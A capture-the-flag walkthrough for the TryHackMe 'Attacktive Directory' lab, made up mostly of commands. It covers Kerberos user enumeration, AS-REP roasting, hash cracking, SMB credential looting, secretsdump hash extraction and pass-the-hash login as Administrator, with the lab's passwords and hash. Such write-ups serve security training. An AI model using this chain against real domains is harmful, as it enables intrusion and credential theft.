Attacktive Directory

Room Link: https://tryhackme.com/room/attacktivedirectory

Walkthrough

Setup

Installing Impacket

git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket
pip3 install -r /opt/impacket/requirements.txt
cd /opt/impacket/ && python3 ./setup.py install

Installing Bloodhound and Neo4j

apt install bloodhound neo4j

Installing kerbrute

git clone https://github.com/ropnop/kerbrute.git
cd kerbrute/
make all

username and password custom lists for this machine

wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/userlist.txt
wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/passwordlist.txt

Welcome to Attacktive Directory

Initial Scan

nmap -A $VICTIM

Scan all ports

nmap -sV -sT -O -p 1-65535 $VICTIM

netbios-ssn port 139 & microsoft-ds port 445

enum4linux $VICTIM

The NetBIOS-Domain Name of the machine

Enumerating Users via Kerberos port 88

kerbrute/dist/kerbrute_linux_386 userenum --dc=$VICTIM -d=spookysec.local. userlist.txt

Abusing Kerberos

validusers.txt

james
svc-admin
robin
darkstar
administrator
backup
paradox

svc-admin allows us to get a ticket without a password. The hash type is Kerberos 5 etype 23 AS-REP.

python3.9 /opt/impacket/examples/GetNPUsers.py -no-pass -usersfile validusers.txt -dc-ip $VICTIM spookysec.local/

Cracking the hash we can see the password is management2005

hashcat -m18200 hash.txt passwordlist.txt
hashcat -m18200 hash.txt passwordlist.txt --show

Back to the Basics

netbios-ssn port 139 & microsoft-ds port 445

smbclient -L $VICTIM -U "svc-admin"
Enter WORKGROUP\svc-admin's password: management2005

smbclient \\\\$VICTIM\\backup -U "svc-admin"
smb: \> dir
smb: \> get backup_credentials.txt

Its a base64 encoded username and password. backup@spookysec.local:backup2517860

cat backup_credentials.txt
echo "YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw" | base64 -d

Elevating Privileges within the Domain - WinRM port5985

python3 /usr/local/bin/secretsdump.py  spookysec.local/backup:backup2517860@$VICTIM > allhashes.txt
cat allhashes.txt | awk -F : '{print $1 ":" $3}' | sort | uniq

Flag Submission PaneLogin as Administrator

evil-winrm -i $VICTIM -u Administrator -H 0e0363213e37b94221497260b0bcb4fc

PreviousJohn The Ripper NextWeaponization

Last updated 1 year ago

hashtagWalkthrough

hashtagSetup

hashtagInstalling Impacket

hashtagInstalling Bloodhound and Neo4j

hashtagInstalling kerbrute

hashtagusername and password custom lists for this machine

hashtagWelcome to Attacktive Directory

hashtagInitial Scan

hashtagScan all ports

hashtagnetbios-ssn port 139 & microsoft-ds port 445

hashtagEnumerating Users via Kerberos port 88

hashtagAbusing Kerberos

hashtagBack to the Basics

hashtagnetbios-ssn port 139 & microsoft-ds port 445

hashtagElevating Privileges within the Domain - WinRM port5985

hashtagFlag Submission PaneLogin as Administrator

Walkthrough

Setup

Installing Impacket

Installing Bloodhound and Neo4j

Installing kerbrute

username and password custom lists for this machine

Welcome to Attacktive Directory

Initial Scan

Scan all ports

netbios-ssn port 139 & microsoft-ds port 445

Enumerating Users via Kerberos port 88

Abusing Kerberos

Back to the Basics

netbios-ssn port 139 & microsoft-ds port 445

Elevating Privileges within the Domain - WinRM port5985

Flag Submission PaneLogin as Administrator